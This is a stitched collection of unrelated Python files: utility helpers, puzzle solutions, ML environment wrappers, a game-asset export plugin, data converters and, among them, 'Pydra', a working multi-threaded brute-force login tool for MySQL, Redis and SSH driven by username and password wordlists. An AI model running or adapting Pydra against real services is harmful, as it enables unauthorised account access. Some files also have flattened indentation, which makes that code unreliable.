def is_user_part_of_host_team(user, host_team):
    """Returns boolean if the user belongs to the host team or not"""
    return ChallengeHost.objects.filter(user=user, team_name=host_team).exists()
# Partially-applied helper: fetch a ChallengeHostTeam instance by pk,
# following base.utils.get_model_object's contract.
get_challenge_host_team_model = get_model_object(ChallengeHostTeam)
|
"""degree of anarray, return the shortest length of the subarrray has same degree with input array."""
from collections import defaultdict
def degree_array(nums):
    """Return the length of the shortest contiguous subarray of *nums* whose
    degree (maximum element frequency) equals the degree of *nums*.

    FIX: the original double-counted the first occurrence of each value
    (appending 1 and then immediately incrementing) and initialized
    ``degree`` to ``len(nums)``, so the "new degree" branch could never
    fire and the function returned 0 for the documented example.
    """
    first_index = {}           # value -> index of its first occurrence
    counts = defaultdict(int)  # value -> occurrences seen so far
    degree = 0                 # highest frequency seen so far
    result = 0                 # shortest window achieving that frequency
    for i, n in enumerate(nums):
        if n not in first_index:
            first_index[n] = i
        counts[n] += 1
        window = i - first_index[n] + 1
        if counts[n] > degree:
            # New degree: this value's window is the only candidate.
            degree = counts[n]
            result = window
        elif counts[n] == degree:
            # Tie between degree elements: keep the shortest window.
            result = min(result, window)
    return result
if __name__ == "__main__":
    # Demo run when executed as a script; the original called the function
    # at import time and silently discarded the result.
    print(degree_array([1, 2, 2, 3, 1, 4, 2]))
|
#!/usr/bin/python3
# 2020-03-17
# [✅] mysql login brute force
# added mysql reconnect on timeout
# read batch size changed to 100x the thread count
# 2020-03-18
# [❌] added Windows Powershell login brute force [!] unfinished
# 2020-03-19
# [❌] added mssql brute force [!] unfinished
# [✅] redis brute force
import time
import optparse
import queue
import threading
import pymysql
import redis
from pexpect import pxssh # ssh
class Pydra:
    """Multi-protocol login brute forcer (mysql / redis / ssh).

    Usernames and passwords may be literal values or paths to ``.txt``
    wordlists; candidate pairs are queued and tried by a pool of worker
    threads until one succeeds.
    """
    def __init__(self, options):
        # `options` comes from optparse (see main()).
        self.ctype = options.ctype
        self.host = options.host
        # Default port per protocol when none was given on the CLI.
        if options.port is None:
            if self.ctype == "mysql":
                self.port = 3306
            elif self.ctype == "redis":
                self.port = 6379
            elif self.ctype == "ssh":
                self.port = 22
            # [!] more protocols to come
        else:
            self.port = options.port
        self.ufile = options.userfile
        self.pfile = options.passfile
        self.thread = options.thread
        self.timeout = options.timeout
        self.verbose = options.verbose
        # Queue at most 100 candidates per worker before draining.
        self.threshold = 100 * self.thread
        self.queue = queue.Queue()
        self.success = False
        self.result = dict()
        self.st = time.time()

    def read_user(self):
        # Read usernames from a .txt wordlist
        if ".txt" in self.ufile:
            with open(self.ufile, 'r', encoding='utf-8') as uf:
                for user in uf.readlines():
                    self.read_pass(user.strip())  # try the whole password list for this user
        # otherwise treat the value as a literal username
        else:
            self.read_pass(self.ufile)

    def read_pass(self, user):
        # Read passwords from a .txt dictionary
        if ".txt" in self.pfile:
            with open(self.pfile, 'r', encoding='utf-8') as pf:
                for pwd in pf.readlines():
                    pwd = pwd.strip()
                    # below the threshold: enqueue the candidate pair
                    if self.queue.qsize() < self.threshold:
                        # print("Put into list: " + user + " " + pwd)
                        self.queue.put(user + "\t" + pwd)
                    # queue full: drain it with worker threads
                    else:
                        self.thread_brute()
            # process whatever is left in the queue
            self.thread_brute()
        # the argument is a single literal password
        else:
            # dispatch to the protocol-specific cracker
            if self.ctype == "mysql":
                self.brute_mysql(user, self.pfile)
            elif self.ctype == "redis":
                self.brute_redis(self.pfile)
            elif self.ctype == "ssh":
                self.brute_ssh(user, self.pfile)

    def thread_brute(self):
        if not self.success:  # no hit yet
            threads = list()  # worker threads
            for n in range(self.thread):
                t = threading.Thread(target=self.brute, )  # create worker
                t.setDaemon(True)
                t.start()  # start worker
                threads.append(t)
            for t in threads:
                t.join()  # wait for the workers to drain the queue
        else:  # stop spawning once a login succeeded
            return

    def brute(self):
        # Worker loop: pop candidates until the queue is empty or a hit
        # was found by any worker.
        while not self.queue.empty() and not self.success:
            user, pwd = self.queue.get().split("\t")
            # dispatch to the protocol-specific cracker
            if self.ctype == "mysql":
                self.brute_mysql(user, pwd)
            elif self.ctype == "redis":
                self.brute_redis(pwd)
            elif self.ctype == "ssh":
                self.brute_ssh(user, pwd)

    def brute_mysql(self, user, pwd):
        try:
            if self.verbose:
                print("[-] try mysql connect: ", user, "@", pwd)
            pymysql.connect(host=self.host, user=user, password=pwd, port=self.port,
                            connect_timeout=self.timeout)  # connection timeout
            self.brute_done(user, pwd)
        except Exception as e:
            if "timed out" in str(e):  # retry the same pair on timeout
                self.brute_mysql(user, pwd)
            return

    def brute_redis(self, pwd):
        try:
            if self.verbose:
                print("[-] try redis connect:", pwd)
            r = redis.StrictRedis(host=self.host, password=pwd, port=self.port, socket_timeout=self.timeout)
            if r.ping():
                self.brute_done(self.ufile, pwd)
        except Exception as e:
            # print(e)
            return

    def brute_ssh(self, user, pwd):
        try:
            s = pxssh.pxssh()
            s.login(self.host, username=user, password=pwd, port=self.port)
            self.brute_done(user, pwd)
        except Exception as e:
            print(e)
            # NOTE(review): if pxssh.pxssh() itself raised, `s` is unbound
            # here and s.close() raises NameError -- confirm and guard.
            s.close()
        pass

    def brute_done(self, user, pwd):
        # Record a successful login and flag all workers to stop.
        print("[+] success login by: ", user, "@", pwd)
        self.success = True
        self.result[user] = pwd
        et = time.time()
        print("[!] Crack time spend:", et-self.st)

    def run(self):
        """Entry point: run the crack and report the result and timing."""
        print("[!] Aim host: " + self.host + ", Crack type: " + self.ctype)
        self.read_user()
        print("[!] Result", self.result)
        et = time.time()
        print("[!] Total time spend:", et-self.st)
def main():
    """Parse CLI options and run a Pydra crack session."""
    # NOTE: optparse has been deprecated since Python 3.2 (argparse is the
    # replacement); kept as-is to preserve the exact CLI surface.
    parser = optparse.OptionParser(usage="python3 %prog [options] arg")
    parser.add_option('-T', '--ctype', dest="ctype", default="mysql", help="crack type")
    parser.add_option('-H', '--host', dest="host", default="127.0.0.1", help="hostname")
    parser.add_option('-P', '--port', type=int, dest="port", help="port")
    parser.add_option('-u', '--userfile', dest="userfile", default="root", help="username or userfile")
    parser.add_option('-p', '--passfile', dest="passfile", default="root", help="password or passfile")
    parser.add_option('-t', '--thread', type=int, dest="thread", default=8, help="thread")
    parser.add_option('-o', '--timeout', type=int, dest="timeout", default=1, help="time out")
    parser.add_option('-q', '--quiet', action="store_false", default=True, dest="verbose", help="keep quiet")
    (options, args) = parser.parse_args()
    Pydra(options).run()


if __name__ == "__main__":
    main()
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
__version__ = "1.0"
from mtenv.core import MTEnv # noqa: F401
from mtenv.envs.registration import make # noqa: F401
__all__ = ["MTEnv", "make"]
|
from pyUbiForge.misc import mesh
from plugins import BasePlugin
from pyUbiForge.ACU.type_readers.datablock import Reader as DataBlock
from pyUbiForge.ACU.type_readers.entity import Reader as Entity
from pyUbiForge.ACU.type_readers.visual import Reader as Visual
from pyUbiForge.ACU.type_readers.lod_selector import Reader as LODSelector
from pyUbiForge.ACU.type_readers.mesh_instance_data import Reader as MeshInstanceData
from typing import Union, List, Dict
import numpy
import pyUbiForge
import logging
class Plugin(BasePlugin):
plugin_name = 'Export DataBlock'
plugin_level = 4
file_type = 'AC2BBF68'
_options = [
{
"Export Method": 'Wavefront (.obj)',
"LOD": 0
},
{
"Texture Type": 'DirectDraw Surface (.dds)'
}
]
def run(self, file_id: Union[str, int], forge_file_name: str, datafile_id: int, options: Union[List[dict], None] = None):
if options is not None:
self._options = options # should do some validation here
# TODO add select directory option
save_folder = pyUbiForge.CONFIG.get('dumpFolder', 'output')
data = pyUbiForge.temp_files(file_id, forge_file_name, datafile_id)
if data is None:
logging.warning(f"Failed to find file {file_id:016X}")
return
data_block_name = data.file_name
data_block: DataBlock = pyUbiForge.read_file(data.file)
if self._options[0]["Export Method"] == 'Wavefront (.obj)':
obj_handler = mesh.ObjMtl(data_block_name, save_folder)
for data_block_entry_id in data_block.files:
data = pyUbiForge.temp_files(data_block_entry_id)
if data is None:
logging.warning(f"Failed to find file {data_block_entry_id:016X}")
continue
if data.file_type in ('0984415E', '3F742D26'): # entity and entity group
entity: Entity = pyUbiForge.read_file(data.file)
if entity is None:
logging.warning(f"Failed reading file {data.file_name} {data.file_id:016X}")
continue
for nested_file in entity.nested_files:
if nested_file.file_type == 'EC658D29': # visual
nested_file: Visual
if '01437462' in nested_file.nested_files.keys(): # LOD selector
lod_selector: LODSelector = nested_file.nested_files['01437462']
mesh_instance_data: MeshInstanceData = lod_selector.lod[self._options[0]['LOD']]
elif '536E963B' in nested_file.nested_files.keys(): # Mesh instance
mesh_instance_data: MeshInstanceData = nested_file.nested_files['536E963B']
else:
logging.warning(f"Could not find mesh instance data for {data.file_name} {data.file_id:016X}")
continue
if mesh_instance_data is None:
logging.warning(f"Failed to find file {data.file_name}")
continue
model_data = pyUbiForge.temp_files(mesh_instance_data.mesh_id)
if model_data is None:
logging.warning(f"Failed to find file {mesh_instance_data.mesh_id:016X}")
continue
model: mesh.BaseModel = pyUbiForge.read_file(model_data.file)
if model is None or model.vertices is None:
logging.warning(f"Failed reading model file {model_data.file_name} {model_data.file_id:016X}")
continue
transform = entity.transformation_matrix
if len(mesh_instance_data.transformation_matrix) == 0:
obj_handler.export(model, model_data.file_name, transform)
else:
for trm in mesh_instance_data.transformation_matrix:
obj_handler.export(model, model_data.file_name, numpy.matmul(transform, trm))
logging.info(f'Exported {model_data.file_name}')
else:
logging.info(f'File type "{data.file_type}" is not currently supported. It has been skipped')
obj_handler.save_and_close()
logging.info(f'Finished exporting {data_block_name}.obj')
# elif self._options[0]["Export Method"] == 'Collada (.dae)':
# obj_handler = mesh.Collada(model_name, save_folder)
# obj_handler.export(file_id, forge_file_name, datafile_id)
# obj_handler.save_and_close()
# logging.info(f'Exported {file_id:016X}')
#
# elif self._options[0]["Export Method"] == 'Send to Blender (experimental)':
# model: mesh.BaseModel = pyUbiForge.read_file(data.file)
# if model is not None:
# c = Client(('localhost', 6163))
# for mesh_index, m in enumerate(model.meshes):
# c.send({
# 'type': 'MESH',
# 'verts': tuple(tuple(vert) for vert in model.vertices),
# 'faces': tuple(tuple(face) for face in model.faces[mesh_index][:m['face_count']])
# })
def options(self, options: Union[List[dict], None]) -> Union[Dict[str, dict], None]:
    """Drive the multi-step options dialog for this export plugin.

    Called first with None (or an empty list) to obtain the initial option
    schema; afterwards called with the accumulated answers, returning either
    a follow-up question schema or None once self._options has been stored.

    :param options: None/[] on the first call, otherwise the list of answer
        dicts collected so far.
    :return: a schema dict describing the next set of questions, or None
        when the dialog is complete.
    """
    if options is None or (isinstance(options, list) and len(options) == 0):
        formats = [
            'Wavefront (.obj)',
            # 'Collada (.dae)',
            # 'Send to Blender (experimental)'
        ]
        # Move the previously chosen format to the front so it shows as the default.
        formats.remove(self._options[0]["Export Method"])
        formats.insert(0, self._options[0]["Export Method"])
        return {
            "Export Method": {
                "type": "select",
                "options": formats
            },
            "LOD": {
                "type": "select",
                "options": [0, 1, 2, 3, 4]
            }
        }
    elif isinstance(options, list):
        if len(options) == 1:
            if options[0]["Export Method"] in ('Wavefront (.obj)', 'Collada (.dae)'):
                # File-based exporters need a follow-up question for the texture format.
                return {
                    "Texture Type": {
                        "type": "select",
                        "options": [
                            'DirectDraw Surface (.dds)'
                        ]
                    }
                }
            else:
                self._options = options
        elif len(options) == 2:
            # Second round of answers (format + texture type): store as final.
            self._options = options
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""Wrapper to fix the number of tasks in an existing multitask environment
and return the id of the task as part of the observation."""
from gym.spaces import Dict as DictSpace
from gym.spaces import Discrete
from mtenv import MTEnv
from mtenv.utils.types import ActionType, ObsType, StepReturnType, TaskStateType
from mtenv.wrappers.ntasks import NTasks
class NTasksId(NTasks):
    def __init__(self, env: MTEnv, n_tasks: int):
        """Wrapper to fix the number of tasks in an existing multitask
        environment to `n_tasks`.

        Each task is sampled in this fixed set of `n_tasks`. The agent
        observes the id of the task.

        Args:
            env (MTEnv): Multitask environment to wrap over.
            n_tasks (int): Number of tasks to sample.
        """
        self.env = env
        super().__init__(n_tasks=n_tasks, env=env)
        self.task_state: TaskStateType
        # Replace the task observation space with a Discrete id in [0, n_tasks).
        self.observation_space: DictSpace = DictSpace(
            spaces={
                "env_obs": self.observation_space["env_obs"],
                "task_obs": Discrete(n_tasks),
            }
        )

    def _update_obs(self, obs: ObsType) -> ObsType:
        # Overwrite the wrapped env's task observation with the integer task id.
        obs["task_obs"] = self.get_task_obs()
        return obs

    def step(self, action: ActionType) -> StepReturnType:
        """Step the wrapped env, re-stamping the observation with the task id."""
        obs, reward, done, info = self.env.step(action)
        return self._update_obs(obs), reward, done, info

    def get_task_obs(self) -> TaskStateType:
        """Return the task observation (here: the integer task id)."""
        return self.task_state

    def get_task_state(self) -> TaskStateType:
        """Return the current task id."""
        return self.task_state

    def set_task_state(self, task_state: TaskStateType) -> None:
        """Switch the wrapped env to the task stored at index `task_state`."""
        self.env.set_task_state(self.tasks[task_state])
        self.task_state = task_state

    def reset(self) -> ObsType:
        """Reset the wrapped env, re-stamping the observation with the task id."""
        obs = self.env.reset()
        return self._update_obs(obs)

    def sample_task_state(self) -> TaskStateType:
        """Sample and return a task id, lazily materialising the task set."""
        self.assert_task_seed_is_set()
        if not self._are_tasks_set:
            # Build the fixed set of n_tasks tasks on first use.
            self.tasks = [self.env.sample_task_state() for _ in range(self.n_tasks)]
            self._are_tasks_set = True
        # The assert statement (at the start of the function) ensures that self.np_random_task
        # is not None. Mypy is raising the warning incorrectly.
        id_task = self.np_random_task.randint(self.n_tasks)  # type: ignore[union-attr]
        return id_task
|
#!/usr/bin/env python
"""Simple Class"""
# Docs
__author__ = 'Vaux Gomes'
__version__ = '1.0.0'
#
class Contact(object):
    """A single address-book entry with derived e-mail and card formats."""

    def __init__(self, name, surname, comp, number):
        """Store the contact, title-casing the text fields and keeping the
        phone number as a string."""
        self.name = name.title()
        self.surname = surname.title()
        self.comp = comp.title()
        self.number = str(number)

    def fullname(self):
        """Return "<Name> <Surname>"."""
        return ' '.join((self.name, self.surname))

    def email(self):
        """Return the lower-cased "name.surname@company.com" address."""
        address = '{0}.{1}@{2}.com'.format(self.name, self.surname, self.comp)
        return address.lower()

    def card(self):
        """Return a business-card line: "<SURNAME>, <Name> (<number>)"."""
        return '{1}, {0} ({2})'.format(self.name, self.surname.upper(), self.number)

    def set_number(self, number):
        """Replace the stored phone number (coerced to a string)."""
        self.number = str(number)
|
import urllib.request

url = 'https://blog.csdn.net/'
headers = ('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36')
# Build a custom opener so the request carries a browser-like User-Agent
# (the default Python UA is often blocked by sites).
opener = urllib.request.build_opener()
opener.addheaders = [headers]
data = opener.open(url).read()
print(len(data))
# `with` guarantees the file is closed even if the write raises,
# fixing the original manual open()/close() which leaked on error.
with open('浏览器模拟.html', 'wb') as f:
    f.write(data)
# req=urllib.request.Request(url)
# res=urllib.request.urlopen(req)
# print(res.geturl())  # there may be redirects; geturl() gives the real URL
|
# Process t independent test cases read from stdin.
for _ in range(int(input())):
    x0, x1, x2 = map(int, input().split())
    y0, y1, y2 = map(int, input().split())
    # Cancel as many y2 against x0, and x1 against y0, as possible.
    y2 -= min(x0, y2)
    x1 -= min(x1, y0)
    # Score +2 per (x2, y1) pair and -2 per leftover (x1, y2) pair.
    print(2 * min(x2, y1) - 2 * min(x1, y2))
|
#!/usr/bin/python
##############################################################################
# Copyright (c) Members of the EGEE Collaboration. 2010.
# See http://www.eu-egee.org/partners/ for details on the copyright
# holders.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at #
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
#
# NAME : glite-info-create
#
# DESCRIPTION : This script helps you create LDIF files.
#
# AUTHORS : David.Horat@cern.ch
# Laurence.Field@cern.ch
#
# WEB: http://cern.ch/gridinfo
#
##############################################################################
import os
import sys
import getopt
import logging
# Function to print the usage/help text to stderr.
def usage():
    """Write the command-line usage and option reference to stderr."""
    sys.stderr.write('Usage: %s -m <module> [OPTIONS] \n' % (sys.argv[0]))
    sys.stderr.write('''
glite-info-create.sh -m <module> [-i <ifaces>] [-t <templates>] [-c <configs>]
[-p <path>] [-o <outpath>] [-d debug]
Parameters:
-m <module> The module you are using. E.g.: site
-i <ifaces> The interface you want to use. E.g.: glue, wlcg (default)
-t <templates> The template you want to use. E.g.: glue1, glue2 (all default)
-c <config> The config file location if outside from the module directory
-p <path> The path for the module directory. Default: /etc/glite-info-static
-d <debug> Debug level: 0:ERROR, 1:WARNING, 2:INFO, 3:DEBUG. Default: 0
Examples:
glite-info-create.sh -m site
glite-info-create.sh -m site -i 'glue wlcg' -t glue2 -c /etc/site.cfg
Web site: http://cern.ch/gridinfo
''')
def parse_options():
    """Parse command-line options into the global `config` dict.

    Populates: ifaces, templates, config (file name), module, path, debug.
    Exits (status 1 or 2) with a usage message on any invalid input.
    """
    global config
    config = {}
    config['debug'] = 0
    config['ifaces'] = []
    config['templates'] = []
    config['path'] = '/etc/glite-info-static'
    try:
        opts, args = getopt.getopt(sys.argv[1:], "i:t:c:m:p:d:h",
                                   ["ifaces", "templates", "config", "module", "path", "debug", "help"])
    except getopt.GetoptError:
        sys.stderr.write("Error: Invalid option specified.\n")
        usage()
        sys.exit(2)
    for o, a in opts:
        if o in ("-i", "--ifaces"):
            config['ifaces'].append(a)
        if o in ("-t", "--templates"):
            config['templates'].append(a)
        if o in ("-c", "--configs"):
            config['config'] = a
        if o in ("-m", "--module"):
            config['module'] = a
        if o in ("-p", "--path"):
            config['path'] = a
        if o in ("-d", "--debug"):
            config['debug'] = a
        if o in ("-h", "--help"):
            usage()
            sys.exit(0)
    try:
        config['debug'] = int(config['debug'])
    # Narrowed from a bare `except:` — int() can only fail these two ways here.
    except (ValueError, TypeError):
        sys.stderr.write("Error: Invalid logging level.\n")
        usage()
        sys.exit(1)
    if (config['debug'] > 3 or config['debug'] < 0):
        sys.stderr.write("Error: Invalid logging level.\n")
        usage()
        sys.exit(1)
    # `in` replaces dict.has_key(), which exists only on Python 2;
    # behaviour is identical on both interpreters.
    if ('module' not in config):
        sys.stderr.write("Error: Mandatory option -m <module> must be specified.\n")
        usage()
        sys.exit(1)
    if ('config' not in config):
        sys.stderr.write("Error: Mandatory option -c <config> must be specified.\n")
        usage()
        sys.exit(1)
    if (len(config['ifaces']) == 0):
        config['ifaces'] = ['glue', 'wlcg']
    if (len(config['templates']) == 0):
        config['templates'] = ['glue1', 'glue2']
    return
def main():
    """Build and print the LDIF for the configured module.

    Reads <path>/<module>/<config>, validates the key/value pairs against
    each interface (.ifc) file, then substitutes the values into each
    template (.tpl) file and prints the resulting LDIF to stdout.
    """
    global config, log
    module = config['module']
    # Get key-values from the configuration file.
    config_file="%s/%s/%s" %(config['path'], module, config['config'])
    if ( not os.path.exists(config_file) ):
        log.error("Config file %s does not exist."%(config_file))
        sys.exit(1)
    parameters = {}
    # Config format: KEY=VALUE per line; repeated keys accumulate values.
    for line in open(config_file).readlines():
        index = line.find('=')
        if ( index > 0 ):
            key = line[:index].strip()
            value = line[index+1:].strip()
            if ( not parameters.has_key(key) ):
                parameters[key] = []
            parameters[key].append(value)
    # Get the mandatory and optional attributes from the interface file.
    for interface in config['ifaces']:
        interface_file="%s/%s/%s.%s.ifc" %(config['path'], module, module, interface)
        if ( not os.path.exists(interface_file) ):
            log.error("Interface file %s does not exist."%(interface_file))
            sys.exit(1)
        interface_parameters = {}
        for line in open(interface_file).readlines():
            index = line.find('=')
            if ( index > 0 ):
                key = line[:index].strip()
                value = line[index+1:].strip()
                if ( not value == ''):
                    values = value.split(" ")
                else:
                    values = []
                if ( not interface_parameters.has_key(key) ):
                    interface_parameters[key] = []
                interface_parameters[key].extend(values)
        # Check the configuration file for the mandatory and optional attributes.
        mandatory_attributes = []
        mandatory_attributes.extend(interface_parameters['MANDATORY_SINGLEVALUED_VARS'])
        mandatory_attributes.extend(interface_parameters['MANDATORY_MULTIVALUED_VARS'])
        for key in mandatory_attributes:
            if ( parameters.has_key(key)):
                for value in parameters[key]:
                    if ( value == '' ):
                        log.error('Mandatory atribute %s does not have a value.' %(key))
                        sys.exit(1)
            else:
                log.error('Mandatory attribute %s is not specified in the configuration file' % (key))
                sys.exit(1)
        optional_attributes = []
        optional_attributes.extend(interface_parameters['OPTIONAL_SINGLEVALUED_VARS'])
        optional_attributes.extend(interface_parameters['OPTIONAL_MULTIVALUED_VARS'])
        for key in optional_attributes:
            if ( parameters.has_key(key)):
                for value in parameters[key]:
                    if ( value == '' ):
                        log.error('Optional atribute %s does not have a value.' %(key))
                        sys.exit(1)
        # Check that single valued attributes are really single
        singlevalued_attributes = []
        singlevalued_attributes.extend(interface_parameters['MANDATORY_SINGLEVALUED_VARS'])
        singlevalued_attributes.extend(interface_parameters['OPTIONAL_SINGLEVALUED_VARS'])
        for key in singlevalued_attributes:
            if ( parameters.has_key(key)):
                if ( len(parameters[key]) > 1 ):
                    log.error('Single valued atribute %s has more than one value.' %(key))
                    sys.exit(1)
    ldif = ""
    # Get the default ldif from the template.
    # NOTE(review): the substitutions below reuse interface_parameters and
    # singlevalued_attributes from the LAST interface iteration, and each
    # template iteration overwrites `ldif`, so only the last template is
    # printed — confirm this is the intended behaviour.
    for template in config['templates']:
        template_file = "%s/%s/%s.%s.tpl" %(config['path'], module, module, template)
        if ( not os.path.exists(template_file) ):
            log.error("Template file %s does not exist."%(template_file))
            sys.exit(1)
        ldif = open(template_file).read()
        multivalued_attributes = []
        multivalued_attributes.extend(interface_parameters['MANDATORY_MULTIVALUED_VARS'])
        multivalued_attributes.extend(interface_parameters['OPTIONAL_MULTIVALUED_VARS'])
        # Do the substitution for single valued attributes
        for attribute in singlevalued_attributes:
            # If there is no value then delete the line, otherwise substitute it.
            if ( parameters.has_key(attribute) ):
                for value in parameters[attribute]:
                    if ( not parameters[attribute] == ''):
                        ldif = ldif.replace('$'+attribute, value)
                    else:
                        ldif = ldif.replace('$'+attribute, '')
            else:
                ldif = ldif.replace('$'+attribute, '')
        # Do the substitution for multivalued attributes
        for attribute in multivalued_attributes:
            # If there is no value then delete the line, otherwise substitute it.
            if ( parameters.has_key(attribute) ):
                # Duplicate the whole "Attribute: " line once per value.
                end = ldif.find('$'+attribute)
                start = ldif[:end].rfind('\n') + 1
                glue_attribute = ldif[start:end]
                chunk = ""
                for value in parameters[attribute]:
                    if ( not parameters[attribute] == ''):
                        chunk += glue_attribute + value + '\n'
                ldif = ldif.replace(glue_attribute+'$'+attribute, chunk[:-1])
            else:
                ldif = ldif.replace('$'+attribute, '')
    print ldif
if __name__ == "__main__":
    global config, log  # NOTE(review): `global` at module scope is a no-op
    parse_options()
    # Log to stderr so the generated LDIF on stdout stays clean.
    log = logging.getLogger('%s' %(sys.argv[0]))
    hdlr = logging.StreamHandler(sys.stderr)
    formatter = logging.Formatter('[%(levelname)s]: %(message)s')
    hdlr.setFormatter(formatter)
    log.addHandler(hdlr)
    # NOTE(review): debug is 0-3 but logging levels are 0/10/20/30, so any
    # of these values effectively enables all messages — confirm intent.
    log.setLevel(config['debug'])
    main()
|
from pygments_css import __version__
def test_dummy():
    """Placeholder test so the suite always has something to run."""
    assert True
|
import time
import random
import itertools
import logging
from functools import wraps
def _retry(fn):
"""
retry a process multiple times before logging the error
"""
@wraps(fn)
def wrapper(*args, **kwargs):
for i in itertools.count():
try:
return fn(*args, **kwargs)
except Exception as e:
if i == 3:
raise
logging.info('Retrying: {}.{} due to {}'.format(fn.__module__, fn.__name__, e))
time.sleep(i + random.random())
return wrapper
|
from .classifier import CovidClassifier
from .masked_lm import MaskedLanguageModel
from .reactivity_classifier import ReactivityClassifier
from .final_classifier import FinalClassifier
|
# -*- coding: utf-8 -*-
"""
Script to convert n-gram files http://ufal.mff.cuni.cz/~hajic/courses/npfl067/stats/czech.html to python dictionaries
"""
from pprint import pprint
import pprint
import re
import sys
import codecs
import string
from unidecode import unidecode
# Length of the n-grams to collect (5 => 5-letter sequences).
NGRAM_LENGTH = 5
# Input corpus statistics file (see the URL in the module docstring).
FILE_PATH = "czech-letters-5.txt"
# Allowed symbols: A-Z plus space. NOTE: string.uppercase is Python 2 only.
alphabet = string.uppercase + " "
def normalize(istring):
    """Upper-case *istring* and verify it only uses `alphabet` characters.

    :return: the normalised string, or False when the input is empty or
        contains a character outside the allowed alphabet.
    """
    # NOTE(review): the two replace() literals below look identical in this
    # copy — they may originally have contained non-ASCII space characters
    # that were mangled; confirm against the original file.
    istring = istring.replace(" ", "")
    istring = istring.replace(" ", " ")
    istring = istring.upper()
    cont = False  # set when any disallowed character is found
    for i in istring:
        if (not i in alphabet):
            cont = True
    if (cont or istring == ""):
        return False
    return istring
# Regex for the conditioning-context line ("...ition: <context> (Count...").
first_pattern = re.compile(ur"ition: (.*) \(Count")
# Regex for a frequency line: "<rank> <letters> (<count>)".
freq_pattern = re.compile(ur"[0-9]+ (.+) \(([0-9]+)\)")
final_dict = {}
with codecs.open(FILE_PATH, "r", "utf-8") as f:
    # Each "Cond..." section of the corpus file describes one context.
    for i in f.read().split("Cond")[1:]:
        l = unidecode(i).split("\n")
        first_match = first_pattern.match(l[0])
        if (first_match):
            first = first_match.group(1)
        else:
            print "ERROR:", l[0]
        first = normalize(first)
        if (not first):
            continue
        print first
        # Lines after the header hold per-continuation frequencies.
        for j in l[2:-1]:
            freq_match = freq_pattern.search(j)
            if (freq_match):
                letter, freq = freq_match.groups([1, 2])
                letter = normalize(letter)
                if (letter):
                    key = first + letter
                    if (len(key) == NGRAM_LENGTH):
                        if (final_dict.has_key(key)):
                            final_dict[key] += int(freq)
                        else:
                            final_dict[key] = int(freq)
                    else:
                        pass
# print "ERROR:", j
# pprint(final_dict)
# Normalise raw counts into relative frequencies.
# NOTE(review): 564532247 is presumably the corpus total count — confirm.
for i in final_dict:
    final_dict[i] /= float(564532247)
final_arr = zip(final_dict.keys(), final_dict.values())
# pprint(sorted(final_arr, key = lambda x: -x[1])[:10000])
# Dump the 10000 most frequent n-grams as a Python literal.
f2 = open("asd", "w")
f2.write(pprint.pformat(sorted(final_arr, key = lambda x: -x[1])[:10000]))
f2.close()
input()
|
import os
import json
import csv
import shutil
from helper import remove_hidden_folder
from variables import *
def convert_yolo_bbox(img_size, box, category):
    """Convert a (x1, y1, x2, y2) pixel box to a YOLO annotation record.

    :param img_size: (width, height) of the image in pixels
    :param box: corner coordinates (x1, y1, x2, y2); values are int()-coerced
    :param category: integer class id placed first in the record
    :return: [category, x_center, y_center, width, height], all normalised
        to [0, 1] by the image dimensions
    """
    scale_w = 1./img_size[0]
    scale_h = 1./img_size[1]
    x_mid = (int(box[0]) + int(box[2]))/2.0
    y_mid = (int(box[1]) + int(box[3]))/2.0
    box_w = abs(int(box[2]) - int(box[0]))
    box_h = abs(int(box[3]) - int(box[1]))
    return [category, x_mid*scale_w, y_mid*scale_h, box_w*scale_w, box_h*scale_h]
def handle_annotations(item_list):
    """Convert each ingredient's JSON bbox annotations into YOLO .txt files.

    Reads per-image JSON (the size/objects/points/exterior key names come
    from variables.py) and writes one space-delimited .txt per image into
    all_image_details_directory.
    """
    for ingredient in item_list:
        annotation_list = os.listdir(f"{images_bbox_directory}/{ingredient}/{ann}")
        annotation_list = remove_hidden_folder(annotation_list)
        # Class id is the numeric prefix of the first file name (e.g. "3-x.json"
        # -> 3); assumes every file in the folder shares the same prefix.
        category = int(annotation_list[0][:annotation_list[0].index("-")])
        print("Category", category)
        for file_name in annotation_list:
            print("Input file name", file_name)
            target_file_name = file_name[:file_name.index(".")] + ".txt"
            print("Target file name", target_file_name)
            bbox_details = json.load(
                open(f"{images_bbox_directory}/{ingredient}/{ann}/{file_name}", "r"))
            image_height = bbox_details[size][height]
            image_width = bbox_details[size][width]
            all_bboxes = bbox_details[objects]
            yolo_bbox_list = []
            for bbox in all_bboxes:
                # Boxes are stored as two exterior points: top-left, bottom-right.
                bbox_coordinates = bbox[points][exterior]
                top_left = bbox_coordinates[0]
                bottom_right = bbox_coordinates[1]
                print("Original_points", image_height,
                      image_width, top_left, bottom_right)
                yolo_bbox = convert_yolo_bbox((image_width, image_height),
                                              (top_left[0], top_left[1], bottom_right[0], bottom_right[1]), category)
                print("Yolo_points", yolo_bbox)
                yolo_bbox_list.append(yolo_bbox)
            # write yolo_bbox_list
            csv_writer_object = csv.writer(
                open(f"{all_image_details_directory}/{target_file_name}", "w+"), delimiter=" ")
            csv_writer_object.writerows(yolo_bbox_list)
            print("="*50)
def handle_images(item_list):
    """Copy every ingredient's image files into all_image_details_directory
    (directory names come from variables.py)."""
    for ingredient in item_list:
        image_list = os.listdir(f"{images_bbox_directory}/{ingredient}/{img}")
        image_list = remove_hidden_folder(image_list)
        for image in image_list:
            print(f"Copying {images_bbox_directory}/{ingredient}/{img}/{image}")
            shutil.copy(f"{images_bbox_directory}/{ingredient}/{img}/{image}", all_image_details_directory)
# variables defined in file variables.py
if not os.path.isdir(all_image_details_directory):
    os.mkdir(all_image_details_directory)
# One sub-directory per ingredient; hidden entries are filtered out.
item_list = [d for d in os.listdir(images_bbox_directory) if os.path.isdir(os.path.join(images_bbox_directory, d))]
item_list = sorted(remove_hidden_folder(item_list))
item_list = remove_hidden_folder(item_list)  # NOTE(review): redundant — already filtered above
print("Handling Annotations")
